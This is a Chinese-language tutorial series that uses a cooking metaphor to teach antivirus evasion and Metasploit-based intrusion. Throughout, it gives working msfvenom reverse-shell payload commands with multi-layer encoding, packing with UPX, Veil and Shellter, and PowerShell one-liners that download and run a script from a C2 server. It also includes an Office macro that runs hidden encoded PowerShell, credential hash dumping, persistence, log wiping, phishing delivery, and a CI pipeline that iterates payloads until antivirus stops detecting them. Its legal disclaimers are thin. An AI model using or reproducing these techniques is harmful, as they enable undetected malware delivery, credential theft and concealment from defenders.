各位小伙伴们，晚上好！

咱们今天打开宵夜“安全食材箱”，聊聊渗透测试绕过杀毒（免杀）的那些门道。你可以把免杀理解为——深夜做宵夜时，家里有人睡觉，但你非得去厨房整点美食，还不能让“安全大妈”（杀毒软件）发现动静，不然饭菜没吃上，还可能挨一顿说教。

今天，我们就用做宵夜挑食材来比喻，搞清楚免杀的原理和检测机制，让每位小伙伴都能把“安全锅”玩明白，轻松整出无人察觉的美味payload！

---

第一节：免杀的本质是什么？（用厨房挑食材来解释）

想象一下，你半夜饿了，厨房冰箱里有好几种食材（各种payload载荷），但你得避开厨房的感应灯（杀毒软件的监控）。你用普通的炸鸡、火腿，容易触发感应灯，直接被抓包。但如果你懂得挑选“隐蔽食材”（改造payload、混淆特征），比如用昨晚剩的米饭包点咸菜，裹点蛋液（变形处理），不仅填饱肚子，还能悄悄溜回卧室，没人发现。

---

白话解释

• 免杀：就是让你的攻击载荷（payload）能避开杀毒和防护软件的查杀，顺利运行，像深夜做宵夜一样不被家人发现。
• 杀毒软件检测机制：主要靠特征码扫描（看你是不是和已知病毒长得像）、行为检测（你是不是做了可疑操作）、云查杀（联网查可疑文件）。
• 免杀方式：可以是改脸换装（编码混淆）、潜行埋伏（内存注入）、加密外壳（壳保护）、个性化定制（自编Payload）等。

---

第二节：常见检测机制一览（厨房的“安全大妈”）

杀毒检测方式	生活比喻	技术解释	典型代表
特征码检测	看食材外观	静态比对文件中的已知代码片段（病毒签名）	瑞星、江民
行为监控	听厨房动静	运行时观察进程操作（如注册表、内存操作等）	火绒、360
云查杀	远程喊人来检查	上传可疑样本到云端进行AI或专家分析	腾讯、金山
白名单/黑名单机制	只让自家食材进厨房	只允许已认证软件运行，陌生程序直接拉黑	企业级管控

---

第三节：免杀原理深度拆解（每种“食材处理”方法都有哪些）

1. 编码混淆（食材变形术）

• 比如把生肉切成肉末裹进饺子皮里，别人就看不出是啥了。
• 技术上常用 msfvenom 进行多层编码，或者自己用Python脚本替换关键字。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o payload.exe

• 这里-e x86/shikata_ga_nai -i 5就是反复“切剁混合”，让原始肉（恶意代码）彻底变形。

2. 外壳加密（加一层外包装）

• 类似外卖小哥给你加一层锡纸袋，拆之前谁都看不出里面是什么。
• 常用UPX、Veil、Shellter等加壳工具。

3. 内存注入（直接把美食塞进嘴里）

• 不落地存储，直接“喂进嘴”，不给冰箱和监控机会检查。
• 技术上利用PowerShell、Cobalt Strike Beacon、Reflective DLL Injection等。

4. 自定义Payload（DIY秘制食谱）

• 用C/C++/Go写自己的载荷，避开通用特征码，像家庭小灶，外面吃不到。

---

坑位预警（常见误区）

• 迷信免杀工具一步到位：万能壳/万能编码只是基础，批量生成的payload容易被AI引擎批量拉黑。
• 忽略行为检测：只变形不收敛行为，操作系统日志/监控一样能抓到。
• 本地查杀和云查杀一起测：有的工具只本地过关，上云即抓。

---

知识加油站

小贴士：
免杀不是单靠“外观变形”，还要控制载荷行为。想想你小时候偷吃东西，既要换包装，还得悄悄吃，不然光靠口罩是遮不住香味的！

---

动手实验室

【实操挑战】

1. 用msfvenom生成一份普通的meterpreter反弹shell payload，在本地用多款杀毒软件检测。
2. 尝试增加编码参数、加壳参数，再次检测，看免杀效果变化。
3. 总结：哪种方法最容易被查杀？原因是什么？

---

延伸阅读

• MSFvenom官方文档
• 攻防世界Pwn Wiki: 免杀技术
• 知名安全论坛-先知社区
• Veil Framework
• 反病毒引擎原理（知乎）

---

各位安全圈的小伙伴们，宵夜课堂继续！
本节我们聊点“后厨真相”：杀毒软件为什么越来越难骗？——深度解析查杀引擎和AI查杀机制的演进。

---

杀毒软件越来越难骗，原理到底在哪？

你还记得小时候，家里装的瑞星小狮子、卡巴斯基之类的杀毒软件吧？以前只要给payload换个壳、改个名字，经常就能混过去。但现在——不管你怎么切菜、怎么包饺子，厨房的“安全大妈”就是能把你抓住。为啥？

🍱 1. “旧时代”杀毒：靠脸识人，特征码查杀

最早的杀毒软件，相当于小区门卫大爷只会“刷脸”——

• 文件指纹：每种病毒/木马都像是有一张照片（特征码、MD5、关键字节序列）。
• 查杀方式：扫描所有进来的文件，看是不是和“通缉名单”里的人脸吻合。

免杀技巧：只要你“化个妆”、改个发型（代码混淆、加壳、改壳、编码器等），大爷基本认不出来，轻松混进去。

---

🍳 2. “新时代”杀毒：加装摄像头，行为检测上岗

门卫越来越专业，不再光看脸，还会“盯动作”：

• 行为检测：实时监控新进厨房的所有“可疑人员”是不是在偷米、加辣、乱动锅铲（API调用、进程注入、内存读写、注册表/文件操作等）。
• 沙箱技术：专门设个小黑屋，把新来的“食材”放进去，录下它怎么折腾，一旦发现异常动作，直接拦截。

免杀技巧：要“学会装乖”——不要一进屋就满地乱跑，要等“安全大妈”巡视后再动手，或者提前侦测自己是不是在沙箱环境。

---

🍜 3. “AI时代”杀毒：智能巡逻队，深度学习模型加持

现在的杀毒软件，就像物业引入了AI巡逻机器人，不仅能识别人脸、行为，还能自我学习、越用越聪明：

• 静态+动态双杀：既看你的外貌（特征码/指纹），又盯你的动作（行为/API/内存痕迹），还会把这些数据统一喂给AI大模型。
• AI查杀机制：机器学习模型每天“吃”下亿万样本，包括最新病毒变种、免杀工具生成品、企业环境中出现的未知程序，通过特征聚类、代码语义分析、异常行为判别、文件流量分析，“活学活用”。
• 云查杀/实时联动：本地发现可疑东西，会上传云端“总部大脑”，一旦判定危险，几分钟内全国所有电脑都能更新查杀规则。

免杀难点：你的“化妆术”和“行为伪装”对AI来说，只要有“基因相似度”或逻辑相近、行为链像是木马操作，都很难彻底骗过。而且“云查杀”让你失去本地免杀的最后一块阵地。

---

🧑‍🏫 技术原理详解

静态查杀机制

• 特征码（Signature）：文件内特定字节序列。
• 哈希比对：MD5/SHA-1/SHA-256。
• 启发式扫描：代码结构/关键API调用顺序等模式。

动态查杀机制

• 进程行为链分析：如explorer.exe突然创建新服务，或者powershell.exe调用wget下载可执行文件。
• 内存取证：检测恶意shellcode、Reflective DLL等可疑加载方式。
• 沙箱分析：可疑文件被自动放入隔离区，模拟点击、输入、联网等全流程运行，收集其全部行为。

AI查杀原理

• 样本训练：海量病毒+正常程序混合大模型训练。
• 特征提取：如指令序列、调用图、行为链、字符串相似度。
• 聚类/对抗学习：自动发现免杀工具的新变种，“一查一大片”。
• 行为画像建模：长期跟踪分析一台机器（如EDR端点防护），多维数据融合，能判定“慢性木马”。

---

⚠️ 坑位预警

• 以为“壳子”无敌？错！AI和行为分析完全不靠壳特征。
• 只在本地杀软测通？云端一检测，马上暴露。
• 忽略内存注入、进程迁移？现在主流EDR都盯着“内存+API”全链路。

---

🎒 知识加油站

小贴士：
现在免杀绝对是“技术+策略+运气”的组合。想骗过AI，要随机、要混淆、要低调、要懂得撤退，还要不断换路数、跟进趋势！

---

💡 思考题

1. 你用过的免杀方法中，有哪些只针对静态查杀，有哪些能兼顾动态和AI查杀？
2. “一刀切”的免杀工具未来还有机会吗？
3. 试着用杀软自带的沙箱/云查杀功能，测试你生成的payload分别能存活多久。

---

📚 延伸阅读

• 《AI在恶意代码检测中的应用》
• 火绒安全实验室技术分析
• 腾讯安全AI查杀系统架构
• Malware Detection with Deep Learning

---

🏁 一句话总结

杀毒软件从“刷脸”到“AI云巡逻”，已从单点识别进化到全链路画像——想免杀，只会“化妆”早就不够，得学会“整容+潜伏+随机行踪”，这是一场永无止境的攻防竞赛。

---

工具篇开场

还记得我们前面聊免杀时，厨房里的每种“食材”需要不同的处理方法，其实背后的厨具（工具）同样关键。Metasploit就是黑客界的“顶级厨具套装”——从切菜刀到榨汁机、再到自动炒锅，应有尽有。每种工具（模块）都有特定用途，组合起来能变幻出无数“安全美食”。

接下来，我会带大家逐层剖析Metasploit的四大核心模块，结合实战案例、生活比喻、命令详解和“安全厨房指南”，帮你玩转这套神兵利器。

---

章节导航

1. Metasploit架构总览：安全厨房的“功能分区”
2. Auxiliary（辅助）模块：厨房里的万能小家电
3. Exploit（漏洞利用）模块：直捣黄龙的主刀厨具
4. Payload（有效载荷）模块：各种“美食原材料”
5. Post（后渗透）模块：餐后打扫与后厨收尾
6. Encoder/No-Encoder：料理变形术与调味秘方
7. 模块选用与组合实战：一场家庭聚会的烹饪流程
8. 坑位预警与安全规范：别把厨房炸了！

---

1. Metasploit架构总览

厨房全景图

想象你家的厨房：

• 冰箱存原材料（Payloads）
• 灶台用来下锅（Exploit）
• 电饭煲、榨汁机负责辅助工作（Auxiliary）
• 洗碗机、打扫工具负责收尾（Post）
• 调料盒让菜色香味俱全（Encoder）

Metasploit把这些模块灵活组合，变成了全能的“渗透测试工厂”。

---

2. Auxiliary（辅助）模块

厨房里的万能小家电

概念：Auxiliary 模块就是厨房各种功能小电器——有的专门打蛋（信息收集）、有的专门榨汁（漏洞探测）、还有消毒柜（爆破、嗅探）等，既能单独用，也能串联主菜流程。

经典Auxiliary模块举例

功能类别	生活类比	典型模块	用法/说明
信息收集	榨汁机	auxiliary/scanner/portscan/tcp	扫描主机端口
弱口令爆破	自动剥蒜机	auxiliary/scanner/ssh/ssh_login	SSH口令爆破
嗅探抓包	煮粥锅	auxiliary/server/capture/http	抓取网络请求
端口监听	留言录音机	auxiliary/server/socks4a	建立SOCKS代理，反弹流量

实战小贴士：
比如要扫描某公司内网的Web服务器端口，可以用：

use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.0/24
run

⚠️注意：
Auxiliary通常不会直接“入侵”，但为后续渗透探路、打下基础。

---

3. Exploit（漏洞利用）模块

主刀厨具，直捣“核心食材”

概念：Exploit模块就是主厨用的“大刀”——刀法精准，直击食材要害，一击致命。它利用目标系统的漏洞，把你的Payload送进去。

典型Exploit模块

功能类别	生活类比	典型模块	用法/说明
操作系统漏洞	砍骨刀	exploit/windows/smb/ms17_010_eternalblue	利用Windows永恒之蓝漏洞远程执行代码
应用程序漏洞	削皮刀	exploit/multi/http/struts2_content_type_ognl	利用Struts2 RCE漏洞
远程服务漏洞	剪刀	exploit/unix/ftp/vsftpd_234_backdoor	利用FTP后门漏洞获得shell

实战Tips：
比如拿永恒之蓝举例：

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.20
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 你的IP
exploit

⚠️注意：
Exploit用力过猛容易“切到骨头”——导致目标宕机、被溯源。渗透测试前一定要获得授权！

---

4. Payload（有效载荷）模块

美食原材料，变形随心搭配

概念：Payload模块就像做菜的食材，炒青菜你放肉、放蛋还是放香肠，全看你的需求。不同Payload决定你“入侵成功后”能做什么。

常见Payload类型

类型	生活类比	功能	常用模块
Command Shell Payload	生菜配火腿	只给你一个命令行	windows/shell/reverse_tcp
Meterpreter Payload	独家招牌菜	拥有全功能远控、隐蔽能力	windows/meterpreter/reverse_tcp
Stager/Stage Payload	分阶段做锅贴	先占点小位置，再分步注入更大功能	windows/meterpreter/reverse_tcp（分段）
Custom Payload	DIY家常菜	用脚本语言/自定义代码写的个性Payload	generic/custom

实战Tips：
经典命令：

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 你的IP
set LPORT 4444

⚠️注意：
Payload内容越复杂，越容易被杀毒拦截。结合“免杀技巧”一起用，效果更佳。

---

5. Post（后渗透）模块

餐后打扫，厨房收尾的秘密武器

概念：Post模块就是你宵夜吃完后的清理工——负责翻冰箱、收垃圾、藏指纹、偷钥匙串（哈希），还能顺道打包去邻居家串门（横向渗透）。

常见Post模块

功能类别	生活类比	典型模块	用法/说明
信息收集	翻冰箱	post/windows/gather/enum_applications	列目标机应用
密码抓取	偷钥匙串	post/windows/gather/hashdump	导出所有账号哈希
横向渗透	串门邻居家	post/windows/gather/enum_shares	枚举内网共享资源
提权辅助	换衣服冒充家主	post/windows/escalate/getsystem	自动尝试权限提升

实战Tips：

use post/windows/gather/hashdump
set SESSION 1
run

---

6. Encoder/No-Encoder：料理变形术与调味秘方

• Encoder就像各种刀工和调料，能把食材切成不同花样，还能掩盖气味（特征码）。
• 经典如x86/shikata_ga_nai，多层编码让payload难以被查杀。
• 但“调料下多了”可能影响菜品口感（程序稳定性）——要平衡。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -e x86/shikata_ga_nai -i 5 -f exe -o test.exe

---

7. 模块选用与组合实战

举例：

一次完整渗透流程
信息收集 → 漏洞探测（Auxiliary）→ 利用漏洞（Exploit）→ 下Payload → 成功上线后后渗透（Post）

实际操作就像做一桌丰盛宵夜：

• 先切配（信息收集）
• 再热锅炒菜（漏洞利用）
• 加菜码味（Payload）
• 最后收拾厨房、打包外卖（Post模块+横向渗透）

---

8. 坑位预警与安全规范

• 坑位一：Auxiliary模块没用对，信息收集不到位，后续全靠猜，成功率大大降低。
• 坑位二：Exploit不匹配目标，容易宕机暴露身份。
• 坑位三：Payload太大或不免杀，容易被端掉锅。
• ⚠️法律边界：所有实操必须获得授权，不得用于未授权环境！安全第一，职业底线。

---

动手实验室

挑战1：

选择一个你常用的Auxiliary模块，结合Exploit和Payload，完成一次“靶机渗透”，并用Post模块收集哈希信息。

挑战2：

尝试用不同Encoder编码生成Payload，测试免杀效果并记录检测结果。

---

延伸阅读

• Metasploit官方文档
• 渗透测试实战：Metasploit模块精讲
• PayloadsAllTheThings（Payload大宝库）
• Rapid7官方知识库

---

各位安全圈的小伙伴们，宵夜升级加料，这节我们正式端上“硬菜”——深度剖析Metasploit每类典型模块的底层原理与免杀细节。
这里我们会逐个模块类型拆解“厨房黑科技”，同时重点讲解如何避开杀毒/EDR的狙击，让你不仅会用，还能灵活变招、不被“安全大妈”抓包。

---

🍲 1. Auxiliary模块底层原理与免杀思路

📖 原理拆解

Auxiliary模块并不直接“入侵”，而是做信息收集、嗅探、爆破、代理等工作。比如端口扫描、服务指纹识别、口令爆破，这些本质就是在模拟合法用户操作。

技术底层：

• 多数Auxiliary模块基于Socket编程实现（比如TCP/UDP端口扫描）
• 有些用到协议解析、模拟（如HTTP/FTP/SMB/LDAP等），甚至能自动识别目标服务版本
• 爆破模块则利用高并发短连接模拟“暴力登录尝试”

🥷 免杀细节

Auxiliary模块被查杀的概率很低，风险主要在爆破、嗅探环节：

• 暴力爆破：连续高频密码尝试易被IDS/EDR检测，可以降速+随机化用户名密码。
• 嗅探扫描：大流量端口扫描会被防火墙/流量审计拦截，建议慢扫、分批、结合端口白名单。
• 真实世界建议：Auxiliary模块要“扮演好普通厨房访客”，避免动作太大、太密集——否则“安全大妈”会立刻注意到厨房异常。

---

🔪 2. Exploit模块底层原理与免杀细节

📖 原理拆解

Exploit模块是主动进攻主厨刀具。

• 大多数Exploit由漏洞触发+恶意payload注入两步组成
• 底层往往利用缓冲区溢出、命令注入、文件上传、反序列化等技术
• 典型操作：通过构造特殊请求包（HTTP、SMB、RPC等）让目标执行你传递的Payload代码
• 支持“多平台/多种利用路径”，如多种协议、不同操作系统分支

🥷 免杀细节

Exploit模块本身被查杀概率小，真正容易被“逮住”的是你注入的Payload内容：

• 载荷显特征：直接用msf默认Payload（尤其是meterpreter、shell）几乎100%被查杀。

• 免杀核心技巧：

  1. 自定义编码（Encoder）：用msfvenom多层编码，把payload结构“搅碎”。如：

     msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe > myevil.exe
     

  2. 外壳封装：加UPX、Veil、Shellter等工具的壳，二次变形掩盖特征码。

  3. 手写Payload变种：用C、Python、Go、PowerShell等自己编译，避开通用规则。

  4. 反沙箱检测：增加时间/环境判断，避免在虚拟机/分析沙箱中立即暴露。

  5. 反EDR技巧：

     • 内存加载，避免落地文件（如Reflective DLL Injection、powershell加载）
     • 加入睡眠/延迟执行、混淆命令等操作，降低检测概率。

⚠️ 坑位预警：别迷信某一类编码或外壳，安全厂商数据库和AI模型会“追更”，需不断更换免杀手法。

---

🥘 3. Payload模块底层原理与免杀细节

📖 原理拆解

Payload是你真正“端进去的菜”——能干的事很多：

• 命令行shell：执行单条命令的“快餐菜”，功能简单，但隐蔽性强
• Meterpreter：全能型payload，功能多（上传/下载/摄像头/提权），但特征明显，易被查杀
• Staged Payloads：分阶段加载，初始只有“门钥匙”，上线后再加载完整功能（如锅贴皮+馅分步下锅）
• 自定义Payload：你DIY的“家常菜”，难以被特征码直接识别

🥷 免杀细节

• 主流杀软的查杀逻辑：

  • 静态特征码匹配
  • 行为检测（进程注入、网络流量、API调用）
  • 云端AI样本比对

• Payload免杀常用技巧：

  1. 多重编码：参考exploit部分

  2. 加壳变形：参考exploit部分

  3. 内存执行（Fileless）：用PowerShell、C#、msbuild等内存加载，不落地文件

  4. 自定义免杀Payload：

     • 用msfvenom只生成shellcode，然后结合自己编写的dropper或者loader
     • 伪装为合法程序流程（如DLL侧载、Office宏、计划任务）

  5. 网络行为伪装：

     • 用HTTPS、DNS隧道等隐蔽流量（如Cobalt Strike Beacon的malleable C2）

实操命令：

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=你的公网IP LPORT=端口 -f exe -e x86/shikata_ga_nai -i 5 -o pay.exe

---

🧹 4. Post模块底层原理与免杀细节

📖 原理拆解

Post模块是“渗透成功后”进行的各种操作：

• 信息收集（如账号哈希、系统信息、敏感文件）
• 持久化（写注册表、添加计划任务、自启动）
• 横向渗透（发现/攻击内网其他主机）
• 清理痕迹（清日志、删除自己、迁移进程）

底层实现：

• 大部分是调用目标操作系统本地API/命令行（比如powershell、cmd、WMI等）
• 有的模块通过自带脚本远程执行（如python、vbscript等）

🥷 免杀细节

• 动作越隐蔽越好：用本地API、系统自带命令（如net user、reg add、schtasks等）最难查杀

• 注意规避行为检测：

  • 持久化时不要使用常见“病毒自启动”方式（如run、runonce注册表键），可用计划任务、服务劫持等
  • 横向渗透要适当降低流量、分批操作，避免批量扫描

• 清痕迹很重要：

  • 用Post模块的clearev等清日志
  • 隐蔽用完的工具，及时kill自己drop的进程

---

🥄 5. Encoder（编码器）原理与免杀本质

• 编码器本质：就是“切菜换刀法”，把原本payload代码按特定算法重新打乱排序，重组还原。
• 常见编码器：x86/shikata_ga_nai（随机变形）、cmd/powershell_base64（伪装字符串）、x64/xor_dynamic（动态异或）等

免杀细节：

• 编码只能防低级静态查杀，对AI行为分析和高级引擎作用有限
• 多层混合编码更难被直接识别，但可能影响payload稳定性
• 建议结合壳、内存加载、流量混淆等多重免杀技术

---

🧑‍🏫 知识加油站

小贴士：
免杀就是在和“安全大妈”玩捉迷藏——只会变脸不够，要会走位、转移、甚至扮成“家里人”。

杀软的检测技术随时在升级，想免杀长期稳定，一定要多手段轮换，还要跟进最新查杀趋势！

---

💥 动手实验室

实验1：

1. 用msfvenom为一个常见Exploit生成默认payload和多层编码payload，分别测试杀软查杀率
2. 用Veil/Shellter等工具再次二次免杀，测试本地/云查杀结果
3. 尝试自己写一个简单的C语言Loader加载payload shellcode，和msfvenom生成exe免杀率对比

实验2：

1. 用post/windows/gather/hashdump收集哈希
2. 用post/windows/manage/persistence写持久化任务，并尝试用不同方式（注册表/计划任务/服务）设置，分析哪种最难被查杀/溯源

---

📚 延伸阅读

• Rapid7 Exploit Development Guide
• Payload免杀顶级技巧集
• Veil-Framework官方指南
• Shellter官方文档
• EDR攻防趋势与实战分析（知乎）

---

🏁 小结

本节我们拆穿了“黑厨具”的核心奥秘，每一类Metasploit模块背后都有自己的免杀技巧与防御升级对策。安全攻防是一场持久战，没有万能神兵，只有不断进化！

---

实战篇 | 从编码混淆到内存注入的免杀全流程

🍜 场景设定

你是一名红队“深夜厨神”，目标是：生成一份能过主流杀毒查杀的Meterpreter远控载荷，并顺利上线。

我们用三步走：

1. 编码混淆——初步“改脸换装”，避开传统特征码查杀
2. 多层变形/加壳——变装升级，迷惑静态扫描+弱AI
3. 内存注入——不落地、躲猫猫，躲过动态/AI查杀（Fileless）

---

第一步：编码混淆（Payload“化妆术”）

比喻：
普通payload就像标准化妆品，一上脸大家都认识。编码混淆=重画五官，换发型、戴口罩，让“安全大妈”认不出。

实操命令

目标：生成多重编码的Meterpreter载荷

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=4444 \
-e x86/shikata_ga_nai -i 7 -f exe -o meterpreter_7x.exe

• -e x86/shikata_ga_nai：经典免杀编码器（支持多层混淆）
• -i 7：迭代7次，效果明显提升
• -f exe：生成可执行文件
• -o：输出文件名

⚠️注意

• 编码层数越高，文件越难查杀，但稳定性可能变差；实际测试建议3~7层较平衡。

---

第二步：加壳/二次变形（“穿外套+假身份”）

比喻：
你已经化了浓妆，但大妈还可能通过你的衣服（PE头/壳特征）和走路方式（API调用）来识别你。加壳/变形，就是再套一层衣服，甚至伪装成外卖小哥/快递员。

主流工具

• UPX（简单加壳，防低端查杀）

  upx --best --lzma meterpreter_7x.exe
  

• Veil Framework（高级免杀生成器，支持多种Payload变种/加壳/脚本伪装）

  veil
  # 选择Payload类型和免杀方式，一键生成
  

• Shellter（动态加壳、插入合法PE程序流程中，防PE特征查杀）

  wine shellter.exe
  # 选择auto mode，嵌入你生成的payload到合法程序
  

⚠️ 坑位预警

• UPX被很多杀软直接识别为壳，需要二次壳脱壳伪装
• Veil/Shellter一定要选低特征、伪装性强的模板
• 所有变形文件都要本地+云端查杀双测试！

---

第三步：内存注入/文件无痕化（“不落地吃宵夜”）

比喻：
终极大招！不是把饭菜端到客厅吃，而是直接在厨房现吃，吃完立刻收拾干净，什么垃圾也不落地。即：payload只存在内存中，不落盘。

技术路线

1. PowerShell一把梭（Invoke-Shellcode）

利用PowerShell加载Shellcode到内存，不生成落地文件，适合绕过查杀：

IEX (New-Object Net.WebClient).DownloadString('http://你的VPS/shell.ps1')

shell.ps1内容可以用 Invoke-Shellcode 工具生成。

2. C#免杀加载器（自编或工具自动化）

• 自己写一个C#小程序，内嵌msfvenom生成的raw格式shellcode，利用VirtualAlloc和CreateThread等API动态加载。
• 可以用 Donut 工具，把Payload变成可直接内存执行的shellcode blob，C#小程序直接调用。

3. msbuild恶意工程（白利用）

• 把payload藏在XML工程文件，用msbuild.exe编译运行，进程可信。
• 参见 msbuild免杀技巧

4. Dll侧载/服务劫持/计划任务

• 用合法程序加载你的DLL，或者通过计划任务把powershell脚本塞到内存里执行。

---

实操流程小结

信息收集 → Payload生成（编码/变形/加壳）→ 本地云查杀测试 → 免杀成功 → 利用Exploit/社会工程送入目标 → 文件落地/内存注入上线 → Post-Exploitation操作

---

🎒 知识加油站

小贴士：
真正的免杀载荷，往往是“多手段叠加”+“随机轮换”+“分批低调投放”，而且一定要严格本地+云端双重检测。

---

⚠️ 法律红线

• 绝不允许在未授权环境和目标上测试、投递payload！
• 一切实战仅限于学习、授权红蓝对抗、合法渗透测试！

---

💡 动手实验室

实验一

1. 用msfvenom生成多层编码的Meterpreter载荷（raw格式和exe格式各一份）。
2. 分别用UPX、Veil、Shellter等工具加壳和变形，记录查杀情况。
3. 将raw shellcode用Invoke-Shellcode或自写C#加载器在沙箱内存执行，监控杀软反应。
4. 最终比对三种方式的免杀率和上线稳定性，总结最优组合。

实验二

1. 选用msbuild免杀、计划任务隐藏、自定义服务加载等方法尝试上线。
2. 用主流EDR和云查杀检测其查杀效果。

---

延伸阅读

• Bypass AV with Veil
• Shellter官方手册
• Fileless Payload实战
• 免杀技巧与EDR对抗案例
• Empire和Invoke-Shellcode教程

---

🏁 一句话总结

真正的免杀，是“化妆+变身+随时跑路”的组合拳。只有不断演化、学会叠加、快速验证，才能在AI查杀时代立于不败！

---

一、多场景实战演练

场景1：Windows 企业域内渗透

目标环境：Windows Server 2016 + 域控 + EDR
实战要点：

1. 信息收集：auxiliary/scanner/smb/smb_version + post/windows/gather/enum_domain
2. 初步上线：生成多层编码+UPX加壳的 Meterpreter EXE
3. 文件落地：先小批量投放到文件服务器，验证查杀率
4. 内存注入：用 PowerShell Invoke-Shellcode 直连域控，绕过文件审计
5. 后渗透：post/windows/gather/hashdump 拉域用户哈希 → run post/windows/manage/persistence 留隐蔽后门

# PS1 内存加载示例
IEX (New-Object Net.WebClient).DownloadString('http://C2/shell.ps1')
Invoke-Shellcode -Force -Shellcode ([System.Convert]::FromBase64String('BASE64_SHELLCODE'))

小贴士：在域环境中，强烈建议将流量伪装成合法Kerberos/SMB调用，避免EDR异常告警。

---

场景2：Linux 关键业务服务器

目标环境：Ubuntu 20.04 + Web 应用 + ClamAV + OSSEC
实战要点：

1. WebShell 持久化：先上传简单 PHP 反弹脚本，测试ClamAV查杀情况
2. Shellcode 内存执行：用Donut生成 ELF shellcode，再在目标上 chmod +x loader 内存加载
3. 横向渗透：post/linux/gather/enum_configs 枚举 SSH 密钥 → ssh_login 爆破邻居主机
4. 清痕迹：定时 rm -f /tmp/loader + 日志清理脚本

// C Loader 伪代码
void main(){ void* buf = VirtualAlloc(...); memcpy(buf, shellcode, size); ((void(*)())buf)(); 
}

坑位预警：ClamAV 对 UPX+shikata 大多能“一刀秒”，必须用自编loader或Donut。

---

场景3：Web 应用渗透 + Office 宏落地

目标环境：Windows 10 客户端 + Office 2019 + Defender
实战要点：

1. 社会工程：邮件投递带有 XLM 宏的 Excel，测试 Defender/ATP 对宏的查杀
2. 宏内存加载：Macro 脚本调用 mshta 或 powershell -enc ，将 shellcode 载入内存
3. 下载器混淆：将下载器脚本用 Base64+XOR 混淆，再在宏里解码执行
4. 持久化：用 WMI Event Subscription 实现开机执行

' Excel Macro 示例
Sub AutoOpen()Dim sc As Stringsc = Decode("BASE64_XOR_PAYLOAD")CreateObject("WScript.Shell").Run "powershell -nop -w hidden -c "& sc
End Sub

注意：Office 宏默认高危，务必先在“钓鱼实验室”测试，多版本多平台验证。

---

二、常见免杀失误大盘点

序号	失误类型	原因分析	应对策略
1	只走编码/只走加壳	依赖单一手段，面对动态/AI查杀无能为力	多手段叠加：编码 + 加壳 + 内存注入
2	本地测试一锤定音	只在本地低端杀软测通，云查杀或EDR一上线即挂	本地+云查杀+EDR沙箱三重验证
3	忽略环境差异	Windows 与 Linux、境外与国内、企业级与个人版差别大	针对不同平台环境专门调优，无差异化直接复用易挂
4	行为检测遗漏	只关注文件，忽略进程注入、网络行为、内存读写	加入延迟执行、正当进程伪装、流量伪装
5	持久化方案单一	都用 run persistence，容易被安全评级识别	多种持久化方式轮换：计划任务、服务劫持、WMI
6	日志清理不到位	清了事件日志，却没清Application/PowerShell日志	全面日志清理：wevtutil + PowerShell 远程日志
7	忽视内存取证	生成payload但落地后未检测内存残留	使用Heap/PEB清理脚本，进程退出前覆盖Shellcode

---

三、动手实验室

1. 三环境验证：针对上面三个场景，各自生成不同类型载荷，进行本地、云查杀、EDR 沙箱测试，记录各平台检测结果。
2. 失误复盘：复盘自己生成的payload，找出遗漏的防御点，并用表格汇总改进前后效果。
3. 脚本自动化：编写一段 Bash/Python 脚本，自动化执行编码 → 加壳 → 云查杀接口查询 → 报告生成的全流程，提升免杀效率。

---

四、延伸阅读

• PayloadsAllTheThings·多场景免杀实践
• Cobalt Strike Malleable C2 配置深度解析
• EDR 逃逸与对抗技术盘点
• Donut–Shellcode 转换工具详解

---

小结

多场景实战+失误盘点，是彻底搞懂免杀技术、打通思路的关键。不同环境有不同痛点，只有反复演练、不断复盘，才能在AI时代的攻防竞赛中保持领先！

---

一、免杀全自动化流水线搭建

1.1 为什么要流水线？（总述）

手工去做编码→加壳→测试→反馈→再改的流程，效率极低，且容易漏掉某个环境的检测。自动化流水线就像现代化生产线：源头统一管理、每一步自动执行、测试报告实时出炉、出厂即合格，让你的免杀载荷始终保持高通过率。

---

1.2 分步详解

步骤	生活比喻	核心目标	常用工具/技术
1. 代码管理	食谱中心	统一维护Payload源码与生成脚本	Git/GitLab/GitHub
2. 持续集成触发	自动进料装置	有新提交或定时触发Pipeline	GitLab CI/CD、Jenkins、GitHub Actions
3. 编码与加壳	自动切菜+裹衣机	一键生成多层编码 & UPX/Veil/Shellter加壳	msfvenom + Shell脚本 + Veil/Shellter CLI
4. 自动化查杀测试	试吃台	本地杀软 + 云端API + EDR沙箱 三重检测	ClamAV、Windows Defender CLI、VirusTotal API、CrowdStrike
5. 报告与反馈	品尝评分系统	根据测试结果自动生成报告，失败自动归档	Python脚本生成HTML/Slack通知/Jira工单
6. 部署输出	打包+入库	合格载荷自动存储到制品库，供渗透工具调用	Nexus/Artifactory、私有HTTP服务器
7. 持续监控	生产线巡检	检测检测规则更新后，自动复测并报警	定时Pipeline、邮件/Slack告警

1.2.1 代码管理与触发示例（GitLab CI）

stages:- build- test- deployvariables:LHOST: "10.0.0.5"LPORT: "4444"build_payload:stage: buildscript:- msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT \-e x86/shikata_ga_nai -i 5 -f raw > shellcode.bin- donut -f shellcode.bin -o loader.exeartifacts:paths:- loader.exescan_payload:stage: testscript:- bash scripts/scan_local.sh loader.exe- python3 scripts/scan_virustotal.py loader.exedependencies:- build_payloaddeploy_payload:stage: deploywhen: on_successscript:- mv loader.exe /opt/payloads/loader_$(date +%F_%H%M%S).exeonly:- master

1.2.2 自动化查杀脚本示例（scan_local.sh）

#!/bin/bash
# 本地ClamAV扫描
clamscan --no-summary loader.exe
# Windows Defender (在CI Windows Runner上执行)
powershell -Command "Start-MpScan -ScanPath 'loader.exe'"

1.2.3 云端API检测示例（scan_virustotal.py）

import requests, sys
API_KEY = 'YOUR_VT_API_KEY'
file_path = sys.argv[1]
files = {'file': open(file_path, 'rb')}
resp = requests.post('https://www.virustotal.com/api/v3/files', files=files,headers={'x-apikey': API_KEY})
print(resp.json())

---

1.3 坑位预警

• 触发频率过高：频繁跑Pipeline会浪费资源，可配置“按提交分支”或“夜间定时”
